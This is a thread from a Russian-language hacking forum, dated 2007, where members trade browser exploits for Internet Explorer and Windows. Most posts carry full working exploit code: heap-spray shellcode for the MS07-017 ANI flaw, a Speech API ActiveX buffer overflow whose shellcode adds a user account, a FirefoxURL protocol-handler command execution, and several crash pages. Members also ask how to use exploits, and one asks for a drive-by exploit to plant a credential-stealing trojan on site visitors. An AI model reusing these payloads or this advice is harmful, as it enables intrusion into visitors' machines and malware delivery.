Эксплойты для браузеров (IE, Mozilla, Opera, Chrome и др.)

Discussion in 'Защита ОС: антивирусы, фаерволы, антишпионы' started by KPOT_f!nd, 26 Sep 2006.

  1. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    ИМХО ответ на твой вопрос:
    Ещё на секурлабе выложен http://www.securitylab.ru/poc/extra/293384.php - пока не пробовал (может есть отличия?)
     
    #21 -=lebed=-, 28 Mar 2007
    Last edited: 28 Mar 2007
  2. rijy

    rijy Banned

    Joined:
    25 Sep 2006
    Messages:
    394
    Likes Received:
    386
    Reputations:
    175
    попробовал щас.. та же фигня, просто ложит осла в даун..

    этот шеллкод нужно менять под себя, но и этот (дефолтный) код должен запускать калькулятор.. а он этого делать не хочет((
     
    1 person likes this.
  3. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    rijy - тебе нужен сполойт чтобы запускал .exe файлы на строне жетрвы?. Если что стучи есть один =)
     
  4. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Имхо постановка такого вопроса не правильна....
    Нужен именно этот сплоит, чтоб запустил калькулятор (тот шеллкод, что зашит в нём).
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Свежак! 04/02/2007 Exploiting the ANI vulnerability on Vista (skape)
    Эксплоит демонстрирует возможность выполнения произвольного кода из-за уязвимости в обработке Ani курсорчиков под винды.
    Детальная информация (на английском) тут:http://metasploit.com/ и тут: http://securityvulns.ru/files/ani_exp.htm
    Code:
    <!--
    
    ..::[ jamikazu presents ]::..
    
    Windows Animated Cursor Handling Exploit (0day) (Version3)
    
    Works on fully patched Windows Vista
    I think it is first real remote code execution exploit on vista =)
    
    Tested on:
    Windows Vista Enterprise Version 6.0 (Build 6000) (default installation and UAC enabled)
    Windows Vista Ultimate Version 6.0 (Build 6000) (default installation and UAC enabled)
    Windows XP SP2 
    (It also must to work on all nt based windows but not tested)
    
    Update: It also bypass eeye security ani patch!
    
    Author: jamikazu 
    Mail: [email protected]
    
    Bug discovered by determina (http://www.determina.com)
    
    Credit: milw0rm,metasploit, SkyLined, http://doctus.net/
    
    invokes calc.exe if successful 
    
    -->
    
    
    <html>
    <head>
    
    <script type="text/javascript">
    
    function runpoc(count)
    {
    	document.location.href="index"+count+".htm";		
    }
    </script>
    </head>
    
    <body onLoad="runpoc(Math.round(100*Math.random()));">
    
    </body>
    
    </html>
    
    как видно, самого кода сплоита тут нет... ;-)
    затеститься (на запуск калькулятора)
     
    #25 -=lebed=-, 4 Apr 2007
    Last edited: 4 Apr 2007
    1 person likes this.
  6. bot

    bot New Member

    Joined:
    27 Dec 2005
    Messages:
    7
    Likes Received:
    1
    Reputations:
    0
    http://www.conecc.org/add_link.php?cat=0
    http://www.csnmonline.org/add_link.php?cat=0

    В осле не открывать!

    Недавно в каталогах регил сайт и нашел забавный сплойт...
    И там и там тоже самое ))
    Честно говоря так и не расшифровал скрипт, кто подскажет что будет если цифры перевести в буквы?

    Вот еще: http://www.fullccacademy.org/
     
    #26 bot, 14 Apr 2007
    Last edited by a moderator: 14 Apr 2007
  7. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Ms Windows (.ani) Gdi Remote Elevation Of Privilege Exploit (ms07-017)

    Цель: Microsoft Windows

    Воздействие: Выполнение произвольного кода

    скачать эксплоит(архив)

    Code:
    <html>
    <head>
    <title>MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017)</title>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <style type="text/css">
    <!--
    body {
    	SCROLLBAR-FACE-COLOR: #000000;
    	FONT-WEIGHT: normal; 
    	SCROLLBAR-HIGHLIGHT-COLOR: #006600; 
    	TEXT-TRANSFORM: none; 
    	SCROLLBAR-SHADOW-COLOR: #000000; 
    	COLOR: #339999; 
    	SCROLLBAR-3DLIGHT-COLOR: #000000; 
    	LINE-HEIGHT: normal; 
    	SCROLLBAR-ARROW-COLOR: #ffffff; 
    	SCROLLBAR-TRACK-COLOR: #000000; 
    	FONT-STYLE: normal; 
    	FONT-FAMILY: Fixedsys; 
    	SCROLLBAR-DARKSHADOW-COLOR: #006600; 
    	BACKGROUND-COLOR: #000000; 
    	FONT-VARIANT: normal; 
    	TEXT-DECORATION: none
    }
    a {
    	color: #33CC33;
    	text-decoration: none;
    }
    a:hover {
    	color: #00FFFF;
    	text-decoration: none;	
    }
    
    -->
    </style>
    </head>
    
    <body>
    <p align='center'><font size='5'>MS Windows (.ANI) GDI Remote Elevation<br>
      of Privilege Exploit (MS07-017)</font></p>
    <p align='center'>&nbsp;</p>
    <p align='left'><strong><font color="#00FFFF">Compatibility</font></strong><br>
      All MS Windows 2000/XP before MS07-017 patch with IE 6 (and later ???).</p>
    <p align='left'><strong><font color="#00FFFF">References</font></strong><br>
      <a href='http://www.microsoft.com/technet/security/advisory/935423.mspx' target='_blank'>http://www.microsoft.com/technet/security/advisory/935423.mspx</a> 
      <br>
      <a href="http://research.eeye.com/html/alerts/zeroday/20061106.html" target="_blank">http://research.eeye.com/html/alerts/zeroday/20061106.html</a> 
      <br>
      <a href="http://www.milw0rm.com/exploits/3688" target="_blank">http://www.milw0rm.com/exploits/3688</a> 
      <br>
      <a href="http://ivanlef0u.free.fr/?p=41" target="_blank">http://ivanlef0u.free.fr/?p=41</a> 
    </p>
    <p align='left'><br>
      Used technique for this exploit (C langage) :<br>
      -&gt; <a href="http://www.milw0rm.com/exploits/3755" target="_blank">http://www.milw0rm.com/exploits/3755 
      <br>
      </a>The same but the code is updated :<br>
      -&gt; <a href="http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_local_elevation_privilege_exploit_ms07_017.zip</a></p>
    <p align='left'>This exploit with source of payload (nasm) :<br>
      <a href="http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zip">http://www.labo-asso.com/download/gdi_remote_elevation_privilege_exploit_ms07_017.zip</a></p>
    <p align='left'>Study (in French) :<br>
      <a href="http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php" target="_blank">http://www.labo-asso.com/php/travaux/gdi_kernel_exploit.php</a></p>
    <p align='left'> <strong><font color="#00FFFF">Patch</font></strong> <br>
      <a href='http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx' target='_blank'>http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspx</a>
      </p>
    <p><strong><font color="#00FFFF" size="4"><em>For educational only !</em></font></strong></p>
    <p><font color="#00FFFF">if</font> (success) displays some kernel informations 
      with help a MessageBox; <br>
      <font color="#00FFFF">else</font> alone knows...;</p>
    <p>Coded by Lionel d'Hauenens <br>
      bugs, comments,... : <a href='http://www.labo-asso.com' target='_blank'>http://www.labo-asso.com</a> 
      or <a href="http://www.labo-asso.com/forum" target="_blank">http://www.labo-asso.com/forum</a><br>
      Avril 20, 2007</p>
    </body>
    </html>
    
    <SCRIPT language="javascript">
    var payLoadCode=unescape(
    "%uE860%u0000%u0000%u815D%u06ED%u0000%u3100%u39C0%u9085%u0004" +
    "%u0F00%uF185%u0002%uE800%u03A6%u0000%uC009%u840F%u02E4%u0000" +
    "%uB5FF%u0514%u0000%uE850%u03C7%u0000%uC009%u840F%u02D0%u0000" +
    "%uC789%uC031%u5450%u406A%uCB68%u0006%u8D00%u0085%u0000%u5000" +
    "%uD7FF%u095B%u0FC0%uB184%u0002%u8900%u949D%u0004%uFF00%u9085" +
    "%u0004%uE800%u0635%u0000%u9090%uE890%u0000%u0000%u815D%u74ED" +
    "%u0000%uE800%u02E7%u0000%uC009%u840F%u0284%u0000%u95FF%u0500" +
    "%u0000%u8589%u04A0%u0000%u95FF%u04FC%u0000%u8589%u04A8%u0000" +
    "%u95FF%u04F0%u0000%u8589%u04A4%u0000%uB5FF%u04A4%u0000%u95FF" +
    "%u04F4%u0000%u8589%u04AC%u0000%u858D%u04E4%u0000%uFF50%u5495" +
    "%u0005%u0900%u0FC0%u0884%u0002%u8900%u9C85%u0004%u3100%u4FFF" +
    "%u8147%uFFFF%u00FF%u0F00%uF287%u0001%u3100%u89C0%u2444%u5004" +
    "%u5050%u1F68%u0F00%u5700%u95FF%u0504%u0000%uC009%uDA74%uC689" +
    "%uDB31%u6A53%u8D10%uD485%u0004%u5000%u5753%u95FF%u0540%u0000" +
    "%uBD81%u04D8%u0000%u0000%u0800%u3F75%u958B%u04A0%u0000%uB70F" +
    "%u9C85%u0004%uC100%u04E0%uC389%uC383%u3B10%uDC9D%u0004%u7300" +
    "%u0122%u8BF0%u9C9D%u0004%uC100%u10EB%u3B66%u0858%u1175%u7880" +
    "%u080A%u0B75%u588B%u8304%uFEE3%u3966%u74D3%u560C%u95FF%u0508" +
    "%u0000%u6DE9%uFFFF%u89FF%u98B5%u0004%u8900%uB885%u0004%u8B00" +
    "%u8918%uB09D%u0004%u3100%u6AC0%u6804%u1000%u0000%u0068%u0010" +
    "%u5000%u95FF%u050C%u0000%uC009%u840F%u013B%u0000%u8589%u04B4" +
    "%u0000%u9D8B%u049C%u0000%u1889%u8B66%uE69D%u0004%u6600%u5889" +
    "%u8D14%u119D%u0003%u8900%u3C58%u0F6A%uB5FF%u04A4%u0000%u95FF" +
    "%u04F8%u0000%u858B%u04B4%u0000%uBD8B%u04B8%u0000%u0789%u3160" +
    "%u50C0%uB5FF%u049C%u0000%u95FF%u0558%u0000%u8B61%uB085%u0004" +
    "%u8900%uFF07%uACB5%u0004%uFF00%uA4B5%u0004%uFF00%uF895%u0004" +
    "%uFF00%u98B5%u0004%uFF00%u0895%u0005%uFF00%u9CB5%u0004%uFF00" +
    "%u5C95%u0005%u6800%u4000%u0000%u0068%u0010%uFF00%uB4B5%u0004" +
    "%uFF00%u1095%u0005%u8D00%u1F85%u0006%u5000%uB5FF%u04BC%u0000" +
    "%u1CE8%u0002%u8D00%u3585%u0006%u5000%uB5FF%u04C0%u0000%u0AE8" +
    "%u0002%u8D00%u5F85%u0006%u5000%uB5FF%u04C4%u0000%uF8E8%u0001" +
    "%u8D00%u7185%u0006%u5000%uB5FF%u04C8%u0000%uE6E8%u0001%u8D00" +
    "%u8385%u0006%u5000%uB5FF%u04CC%u0000%uD4E8%u0001%u8D00%u9585" +
    "%u0006%u5000%uB5FF%u04D0%u0000%uC2E8%u0001%u3100%u6AC0%u8D10" +
    "%u689D%u0005%u5300%u9D8D%u0578%u0000%u5053%u95FF%u0528%u0000" +
    "%uC031%u5450%uB5FF%u0494%u0000%uCB68%u0006%u8D00%u0085%u0000" +
    "%u5000%u95FF%u0514%u0000%uC483%u8B04%u2C95%u0005%u8D00%u009A" +
    "%u0001%u8900%uFCE6%u3B64%u0435%u0000%u7300%uAD19%uD039%uF276" +
    "%uD839%uEE73%u468D%u89F8%u2444%u611C%uC489%u315D%uC2C0%u0018" +
    "%uC031%uF0F7%uFACC%uE860%u0000%u0000%u815D%u18ED%u0003%u6600" +
    "%uE08C%u8366%u30F8%u1575%uA164%u0124%u0000%u8589%u04C0%u0000" +
    "%u408B%u8944%uBC85%u0004%u0F00%uC020%u8589%u04C4%u0000%u200F" +
    "%u89D0%uC885%u0004%u0F00%uD820%u8589%u04CC%u0000%u200F%u89E0" +
    "%uD085%u0004%u6100%uC031%uFB40%u60C3%u00E8%u0000%u5D00%uED81" +
    "%u036D%u0000%uBD8D%u04EC%u0000%u47E8%u0000%u0900%u74C0%uFC3F" +
    "%uC689%u3F83%u7400%uFF0F%u5637%u68E8%u0000%u0900%u74C0%uAB2B" +
    "%uECEB%uC783%u8304%u003F%u1774%uF889%u5040%u95FF%u04EC%u0000" +
    "%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD%u40C0%u4489%u1C24" +
    "%uC361%uC031%uF6EB%u3152%u64C0%u008B%u108B%u7442%u8B04%uEB00" +
    "%u8BF7%u0440%u0025%uFF00%u66FF%u3881%u5A4D%u0774%u002D%u0100" +
    "%uEB00%u8BF2%u3C50%u3C81%u5010%u0045%u7400%u3102%u5AC0%u60C3" +
    "%u448B%u2424%u4003%u8D3C%u1840%u408D%u8B60%u0938%u74FF%u0352" +
    "%u247C%u8B24%u184F%u5F8B%u0320%u245C%uFC24%u7C49%u8B40%u8B34" +
    "%u7403%u2424%uC031%uAC99%uC008%u0774%uC2C1%u0107%uEBC2%u3BF4" +
    "%u2454%u7528%u8BE1%u2457%u5403%u2424%uB70F%u4A04%uE0C1%u8B02" +
    "%u1C57%u5403%u2424%u048B%u0310%u2444%u8924%u2444%u611C%u08C2" +
    "%u3100%uEBC0%u60F4%u548B%u2424%u7C8B%u2824%u08B9%u0000%uFD00" +
    "%u7C8D%uFF0F%uD088%u0F24%u3004%u393C%u0276%u0704%uC1AA%u04EA" +
    "%uEEE2%u61FC%u08C2%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
    "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
    "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
    "%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000" +
    "%u0000%u0000%u0000%u0000%u0000%u0000%u0300%u0001%u0000%u0000" +
    "%uFFC9%u10DF%u8FDB%u9876%u6B0B%u89D2%u6B0B%u89DE%uE60F%u0B08" +
    "%uE7A6%u3983%u910E%uD782%u9266%u4982%u99C0%u9291%u9FA8%uBBC6" +
    "%u12C8%u9711%u0000%u0000%u750C%u6573%u3372%u2E32%u6C64%u006C" +
    "%u96F2%u4C43%u854C%u4BFD%u0000%u0000%u6E0C%u6474%u6C6C%u642E" +
    "%u6C6C%u0000%u0491%uA8D8%u0000%u0000%u670C%u6964%u3233%u642E" +
    "%u6C6C%u0000%uD6E4%uC5C6%u62C6%u582D%uA1E8%u934B%u0000%u0000" +
    "%u0000%u0000%u6952%u676E%u2030%u6572%u6F70%u7472%u0000%u0000" +
    "%u534D%u5720%u6E69%u6F64%u7377%u2820%u412E%u494E%u2029%u4447" +
    "%u2049%u6552%u6F6D%u6574%u4520%u656C%u6176%u6974%u6E6F%u6F20" +
    "%u2066%u7250%u7669%u6C69%u6765%u2065%u7845%u6C70%u696F%u2074" +
    "%u4D28%u3053%u2D37%u3130%u2937%u0D0A%u6F43%u6564%u2064%u7962" +
    "%u4C20%u6F69%u656E%u206C%u2764%u6148%u6575%u656E%u736E%u0D0A" +
    "%u7468%u7074%u2F3A%u772F%u7777%u6C2E%u6261%u2D6F%u7361%u6F73" +
    "%u632E%u6D6F%u0D0A%u0D0A%u6F46%u2072%u6465%u6375%u7461%u6F69" +
    "%u616E%u206C%u6E6F%u796C%u2120%u0D0A%u0D0A%u504B%u4F52%u4543" +
    "%u5353%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u4B0D%u4854" +
    "%u4552%u4441%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u0A0D" +
    "%u430D%u6E6F%u7274%u6C6F%u5220%u6765%u7369%u6574%u7372%u0A3A" +
    "%u0A0D%u430D%u3052%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F" +
    "%u430D%u3252%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u430D" +
    "%u3352%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u0A3F%u430D%u3452" +
    "%u3A20%u3020%u3F78%u3F3F%u3F3F%u3F3F%u003F%u9090%u6090%u858D" +
    "%u0000%u0000%uE083%u7403%uF718%u83D8%u04C0%u9EB9%u0006%u8D00" +
    "%u0DB4%uFFFF%uFFFF%u3C8D%uFD06%uA4F3%u61FC%u0483%u0324%u90C3");
    
    	function getSpraySlide(spraySlide, spraySlideSize)
    	{
    		while (spraySlide.length*2<spraySlideSize)
    		{
    			spraySlide += spraySlide;
    		}
    		spraySlide = spraySlide.substring(0,spraySlideSize/2);
    		return (spraySlide);
    	}
    
        if (confirm ("This exploit execute code with kernel privilege.\n"
                    +"Do you want to take really this risk?  :p"))
        {
            var SizeOfHeapEntry = 0x28;
        	var heapSprayToAddress = 0x04040404;
        	var payLoadSize = payLoadCode.length * 2;
            var heapBlockSize = 0x400000;
        	var spraySlide = unescape("%u9090%u9090");
        	var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapEntry);
        	var heapBlocks = (heapSprayToAddress-01000000)/heapBlockSize;
        	var memory = new Array();
            spraySlide = getSpraySlide(spraySlide,spraySlideSize);
        
        	for (i=0;i<heapBlocks;i++)
            {
              memory[i] = spraySlide +  payLoadCode;
            }
    
            document.write("<HTML><BODY><style>BODY{CURSOR: url('ani.htm')}</style></BODY></HTML>");
        }
    </SCRIPT>
    
     
  8. Alexsize

    Alexsize Fail

    Joined:
    17 Sep 2005
    Messages:
    1,771
    Likes Received:
    1,221
    Reputations:
    704
    #28 Alexsize, 8 Jun 2007
    Last edited: 8 Jun 2007
    1 person likes this.
  9. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Ты как был дебил так и остался , прежде чем делать такие громкие заявления посмотри сами эксплоиты.Они в основном под ActiveX компоненты но не под ие
     
    2 people like this.
  10. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Microsoft Speech Api Activex Control Remote Bof Exploit (xp Sp2)

    Цель: Microsoft Windows XP
    Воздействие: Выполнение произвольного кода
    MS07-033_expl2.htm

    Code:
    <!--
    6.30 10/06/2007
    Microsoft Windows DirectSpeechSynthesis Module (XVoice.dll 4.0.4.2512)
    / DirectSpeechRecognition Module (Xlisten.dll 4.0.4.2512)
    remote buffer overflow exploit/ xp sp2 version
    
    both dlls are vulnerable, this is the poc for the first one
    worked regardless of boot.ini settings, remotely and
    by dragging the html file in the browser window
    tested against IE 6
    
    by A. Micalizzi (aka rgod )
    
    this is dedicated to Sara, and greetings to shinnai, a good comrade
    
    ***note: this was indipendently discovered by me and Will Dormann during the
    same period, documented here:
    
    http://www.kb.cert.org/vuls/id/507433
    http://www.microsoft.com/technet/security/Bulletin/MS07-033.mspx
    
    the affected package,
    http://www.microsoft.com/speech/AppHelp(SAPI4)/sapi4.asp
    
    is still distributed with the kill bit not set
    -->
    
    <html>
    <object classid='clsid:EEE78591-FE22-11D0-8BEF-0060081841DE' id='DirectSS'></OBJECT>
    <script language='vbscript'>
    
    REM metasploit, add a user 'su' with pass 'tzu'
    scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%50%75%68%69%39%6c%38%68%31%54%43%30%47%70%57%70%4c%4b%30%45%77%4c%6e%6b%31%6c%47%75%51%68%43%31%48%6f%6c%4b%52%6f%75%48%4c%4b%63%6f%31%30%53%31%38%6b%71%59%6c%4b%36%54%6c%4b%47%71%48%6e%64%71%4f%30%4d%49%6c%6c%4e%64%4b%70%30%74%76%67%4a%61%39%5a%76%6d%55%51%6b%72%4a%4b%68%74%47%4b%70%54%35%74%55%54%61%65%6b%55%6c%4b%41%4f%77%54%34%41%48%6b%71%76%6e%6b%46%6c%62%6b%6e%6b%33%6f%77%6c%54%41%68%6b%6e%6b%57%6c%6c%4b%46%61%48%6b%4f%79%61%4c%71%34%56%64%48%43%54%71%4b%70%31%74%4c%4b%37%30%46%50%4f%75%4f%30%41%68%46%6c%6e%6b%43%70%46%6c%6c%4b%30%70%35%4c%6e%4d%4e%6b%50%68%35%58%68%6b%56%69%6c%4b%4b%30%6e%50%57%70%53%30%73%30%4e%6b%62%48%67%4c%43%6f%50%31%4a%56%51%70%36%36%6d%59%58%78%6d%53%49%50%33%4b%56%30%42%48%41%6e%58%58%6d%32%70%73%41%78%6f%68%69%6e%6f%7a%54%4e%42%77%49%6f%38%67%33%53%30%6d%75%34%41%30%66%4f%70%63%65%70%52%4e%43%55%31%64%31%30%74%35%33%43%63%55%51%62%31%30%51%63%41%65%47%50%32%54%30%7a%42%55%61%30%36%4f%30%61%43%54%71%74%35%70%57%56%65%70%70%6e%61%75%52%54%45%70%32%4c%70%6f%70%63%73%51%72%4c%32%47%54%32%32%4f%42%55%30%70%55%70%71%51%65%34%32%4d%62%49%50%6e%42%49%74%33%62%54%43%42%30%61%42%54%70%6f%50%72%41%63%67%50%51%63%34%35%77%50%66%4f%32%41%61%74%71%74%35%50%44") + NOP
    
    eax= unescape("%ff%13")
    ebp= unescape("%ff%13")
    eip= unescape("%01%0a") : REM jmp to scode, UNICODE expanded
    jnk= string(50,unescape("%13"))
    
    suntzu = string(888,"A") + ebp + eip + eax + jnk
    
    bufferI   = string(9999999,"X")
    bufferII  = string(9999999,"Y")
    bufferIII = string(9999999,"Z")
    bufferIV  = string(9999999,"O")
    
    EngineID= string(200000,"b")
    MfgName="default"
    ProductName="default"
    ModeID= string(199544,unescape("%90")) + scode
    ModeName= suntzu
    LanguageID=1
    Dialect="default"
    Speaker="default"
    Style=1
    Gender=1
    Age=1
    Features=1
    Interfaces=1
    EngineFeatures=1
    RankEngineID=1
    RankMfgName=1
    RankProductName=1
    RankModeID=1
    RankModeName=1
    RankLanguage=1
    RankDialect=1
    RankSpeaker=1
    RankStyle=1
    RankGender=1
    RankAge=1
    RankFeatures=1
    RankInterfaces=1
    RankEngineFeatures=1
    
    DirectSS.FindEngine EngineID, MfgName, ProductName, ModeID, ModeName, LanguageID, Dialect, Speaker, Style, Gender, Age, Features, Interfaces, EngineFeatures, RankEngineID, RankMfgName, RankProductName, RankModeID, RankModeName, RankLanguage, RankDialect, RankSpeaker, RankStyle, RankGender, RankAge, RankFeatures, RankInterfaces, RankEngineFeatures
    
    </script>
    </html>
    
     
    2 people like this.
  11. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    Выполнение произвольного кода в Microsoft Internet Explorer.

    Выполнение произвольного кода в Microsoft Internet Explorer
    Версии: 6.x, 7.x
    Описание:
    Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.
    Уязвимость существует из-за ошибки в обработчике URL FirefoxURL в Осле на системах с установленой Лисой.
    Удаленный пользователь может с помощью специально сформированной Web страницы, при выполнении в ИЕ изменить путь к Mozilla Firefox и выполнить произвольный код на целевой системе.
    Пример: http://larholm.com/vuln/firefoxurl.html
    Code:
    <html><body>
    <iframe src="firefoxurl://larholm.com" -chrome "javascript:C=Components.classes;I=Components.interfaces;
    file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);
    file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+
    String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+
    String.fromCharCode(92)+'cmd.exe');
    process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);
    process.init(file);
    process.run(true,[calc],1);">
    </body></html> 
    ЗЫ
    Короче вариант рабочий, но только если у целевого пользователя стоит и Осел и Лиса. Имхо если так то врядли пользователь полезет на страницу через Осла. Но запостил т.к. все-таки уязвимость в IE.
     
  12. xPriZrAkx

    xPriZrAkx Member

    Joined:
    16 Mar 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    0
    Как ваще пользоватся сплоитом?
    Например : [Internet Explorer Cursor Processing Remote DoS]
    РАсскажите или снимите видео плиз, я ваще непойму как это ваще творится хочу научится!
     
  13. gibson

    gibson Elder - Старейшина

    Joined:
    24 Feb 2006
    Messages:
    391
    Likes Received:
    247
    Reputations:
    88
    DirectX Media Remote Overflow DoS Exploit 2007-07-31

    DirectX Media Remote Overflow DoS Exploit
    Internet Explorer ver 6.0
    Проверить здесь
     
    1 person likes this.
  14. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Программа:
    Microsoft Internet Explorer 7.x
    Microsoft Windows Server 2003 Datacenter Edition
    Microsoft Windows Server 2003 Enterprise Edition
    Microsoft Windows Server 2003 Standard Edition
    Microsoft Windows Server 2003 Web Edition
    Microsoft Windows XP Home Edition
    Microsoft Windows XP Professional

    PHP:
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <
    html xmlns="http://www.w3.org/1999/xhtml">
    <
    head>
    <
    meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
    <
    title>Тест линк</title>
    </
    head>

    <
    body>
    <
    p><a href="mailto:test%../../../../windows/system32/calc.exe.cmd">mailto</a></p>
    <
    p><a href="telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l">telnet</a></p>
    <
    p><a href="news:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1">news</a></p>
    <
    p><a href="nntp:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1">nntp</a></p>
    <
    p><a href="snews:// “%ProgramFiles%\Outlook Express\msimn.exe” /newsurl:%1">snews</a></p>
    <
    p><a href="mailto:// C:\lotus\notes\notes.exe /defini %1">mailto</a></p>
    <
    p><a href="nntp:%00/../../../windows/system32/calc.exe”.bat">nntp</a></p>
    </
    body>
    </
    html>
    ЗЫ Кто затестит на седьмом осле?
     
    1 person likes this.
  15. DeBugger

    DeBugger Banned

    Joined:
    6 Sep 2006
    Messages:
    134
    Likes Received:
    43
    Reputations:
    6
    Попробовал. Эффекта не добился.
     
  16. zl0y

    zl0y Banned

    Joined:
    13 Sep 2006
    Messages:
    371
    Likes Received:
    270
    Reputations:
    109
    А я давно её обнаружил когда еще фаерфокс 1.0.7 был ,только делал по другому вставлял редикт на .exe типа http://../../../../../1.exe
     
  17. [53x]Shadow

    [53x]Shadow Leaders of Antichat

    Joined:
    25 Jan 2007
    Messages:
    284
    Likes Received:
    597
    Reputations:
    514
    MS07-042 IE 6 XMLDOM substringData() DoS Exploit

    Цель: Internet Explorer 6

    Воздействие: Отказ в обслуживании

    Code:
    <html>
    <body>
    <script language="javascript">
    var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
    xmlDoc.loadXML("<dummy></dummy>");
    var txt = xmlDoc.createTextNode("huh");
    var out = txt.substringData(1,0x7fffffff);
    </script>
    </body>
    </html>
    
     
    1 person likes this.
  18. ртуть

    ртуть Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    314
    Likes Received:
    389
    Reputations:
    29
  19. L0n1

    L0n1 Member

    Joined:
    25 Mar 2007
    Messages:
    27
    Likes Received:
    7
    Reputations:
    0
    прив. всем. Вот хотелбы спросить , есть ли статья для Новечков как пользоваться сплоитам ... в Общем мне нужно тока одно чтоб человек заходил на сайт и ему загружался трой ( Пинчег ) . Кто может дать сылку на статью про Сплоиты и какой сплоит посоветуйте для этого , онли паблик ... Просто друг мне еще обещал закриптить его ...
     
  20. THE_END

    THE_END Member

    Joined:
    29 Jul 2006
    Messages:
    16
    Likes Received:
    8
    Reputations:
    0
    Уязвимости в Microsoft Internet Explorer (всего 117 ).



    Уязвимость позволяет удаленному пользователю получить доступ к важным данным.

    PHP:

    <script>

    function 
    Clear() {
    document.getElementById("label1").htmlFor="file1";
    document.getElementById("text1").focus();
    }

    function 
    Down() {
    document.getElementById("file1").focus();
    }

    </script>

    <input type="file" id="file1" name="file1" onkeydown="Clear()" onkeyup="Clear()" />
    <label id="label1" name="label1"></label>
    <br />
    <textarea name="text1" id="text1" onkeydown="Down()">
    </textarea>

    © securitylab.ру
     
    #40 THE_END, 2 Oct 2007
    Last edited: 2 Oct 2007
    2 people like this.